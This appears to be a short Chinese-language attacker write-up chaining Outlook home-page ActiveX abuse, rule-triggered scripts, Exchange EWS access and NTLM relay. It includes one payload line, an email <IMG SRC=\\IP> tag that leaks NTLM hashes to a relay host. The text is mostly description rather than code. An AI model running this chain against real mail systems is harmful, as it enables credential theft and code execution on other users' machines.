Outlook濫用利用鏈
<div>
只要打開OUTLOOK就會立即執行,最主要的是可以該主頁可以調用outlook的內部IE瀏覽器,Outlook的內部IE瀏覽器可以執ACTIVEX,從而執行可執行程序。最騷的是即使在outlook設置中禁用了ACTIVEX,也不影響內部IE瀏覽器的ACTIVEX。
如:a.html,創建一個wscript.shell,執行notepad。代碼詳情見
https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
只要重新啓動OUTLOOK即可直接執行。
二、OUTLOOK的規則濫用(遠程喚起)
主頁濫用每次重啓OUTLOOK都會執行惡意腳本,這樣在某些特殊情況下可能會動靜太大。這裏利用outlook的規則制定,打開管理規則和通知,點擊新建規則新建空白規則,點擊下一步
通過自己的需求,設置制定規則,如收到包含fuck爲主題的郵件就彈出計算器。
通過這樣就可以遠程喚醒惡意腳本了。
三、exchange ews
Exchange ews接口支持NTLM認證,從而進行收發件,配置郵箱等操作,當然也可以配置上文的主頁和規則,這樣我們只要拿到NTLM憑證就可以操控本地用戶的outlook的配置,從而執行惡意程序。四、NTLM中繼
要想快速拿到NTLM憑證,最快的方式就是dump密碼和hash中繼。既然outlook存在低版本的內置ie瀏覽器這邊選hash中繼。五、域內用戶相互信任機制
在域內內部組織成員互相發送郵件是能夠加載JS的,只要在郵件正文插入JS,如<IMG SRC=\\IP(NTLM中繼地址)>,這樣倒敘往上推就可以拿下任何人的當前權限了。 從步驟5,4,3,2/1就可以形成攻擊鏈了